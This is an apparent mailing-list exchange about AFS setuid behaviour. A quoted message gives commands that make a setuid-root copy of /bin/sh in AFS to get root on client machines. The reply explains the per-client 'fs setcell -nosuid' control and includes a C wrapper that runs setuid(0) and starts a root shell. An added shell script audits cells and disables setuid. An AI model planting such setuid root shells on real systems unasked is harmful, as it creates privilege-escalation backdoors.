> At Brookhaven National lab, we just found something very interesting.
> That is if you know AFS admin password, you can become root on any
> AFS client machines in the cell (except Solaris machines). We did the
> following tests on AIX, SGI, HPUX and we succeeded. Solaris somehow is
> smart enough to stop the break-in.
> 
> login as user on any AFS client machine belonging to your cell
> % klog admin
> % cd /afs/<your-cell>
> % cp /bin/sh .
> % chown root sh
> % chmod 4755 sh
> % ./sh
> % whoami
>   root
> 
> In other words, if I am AFS administrator, I can be root on any AFS client
> machines belonging to my cell. Is it cool?

Yes.  Actually, it's quite useful, in many cases.  By default, this
behaviour is enabled for the local cell, and disabled for any other cell.
You can use 'fs setcell <cell> -suid' to turn it on, or
'fs setcell <cell> -nosuid' to turn it off, for any particular cell
(including the local cell).  This setting is per-client.

Incidentally, it's not so much that Solaris is "smart" as that the
shell tries really hard to prevent itself from being invoked setuid,
or to run a setuid script.  Below is a small C program that I use when
I need this ability on a Solaris machine:

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int
main(void)
{
  /* Become root; only succeeds if the binary is setuid root (or we are root). */
  if (setuid(0)) {
    printf("Setuid failed: %d\n", errno);
    exit(0);
  }
  /* Replace this process with an interactive shell running as root. */
  execl("/bin/sh", "sh", "-i", (char *)0);
  return 1;
}

-- Jeffrey T. Hutzelman (N3NHS) <[EMAIL PROTECTED]>
   Systems Programmer, CMU SCS Research Facility
   Please send requests and problem reports to [EMAIL PROTECTED]
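As an added example (mine, not from anyone in this thread), here is a small POSIX sh audit of which cells a client still trusts with setuid, with an optional remediation via the 'fs setcell <cell> -nosuid' setting mentioned above. It assumes OpenAFS output formats: 'fs listcells' printing "Cell <name> on hosts ..." and 'fs getcellstatus <cell>' printing "Cell <name> status: setuid allowed" or "Cell <name> status: no setuid allowed".

```shell
#!/bin/sh
# Added example, not from the original thread: audit which cells this AFS
# client allows setuid for, and optionally turn it off with `fs setcell -nosuid`.
# Assumed output formats (OpenAFS): `fs listcells` prints "Cell <name> on hosts ...",
# `fs getcellstatus <cell>` prints "Cell <name> status: setuid allowed"
# or "Cell <name> status: no setuid allowed".

# classify_cell_status LINE
# Parses one `fs getcellstatus` line; prints "<cell> suid" or "<cell> nosuid".
# Returns 1 if the line is not in the expected format.
classify_cell_status() {
  cell=$(printf '%s\n' "$1" | awk '$1 == "Cell" && $3 == "status:" { print $2 }')
  [ -n "$cell" ] || return 1
  case "$1" in
    *"status: no setuid allowed") printf '%s nosuid\n' "$cell" ;;
    *"status: setuid allowed")    printf '%s suid\n' "$cell" ;;
    *) return 1 ;;
  esac
}

# audit_afs_cells
# Prints one "<cell> suid|nosuid|unknown" line per cell the client knows about.
audit_afs_cells() {
  fs listcells | awk '$1 == "Cell" { print $2 }' | while read -r cell; do
    classify_cell_status "$(fs getcellstatus "$cell")" ||
      printf '%s unknown\n' "$cell"
  done
}

# disable_suid_cells [--apply]
# Without --apply, only reports cells that still allow setuid;
# with --apply, runs `fs setcell <cell> -nosuid` on each (needs root on the client).
disable_suid_cells() {
  audit_afs_cells | while read -r cell state; do
    [ "$state" = suid ] || continue
    if [ "$1" = --apply ]; then
      fs setcell "$cell" -nosuid && printf 'disabled setuid for %s\n' "$cell"
    else
      printf '%s still allows setuid (run with --apply to disable)\n' "$cell"
    fi
  done
}
```

Note that the setting is per client, so the script has to be run on every client machine, and a local cell left at the default keeps setuid enabled.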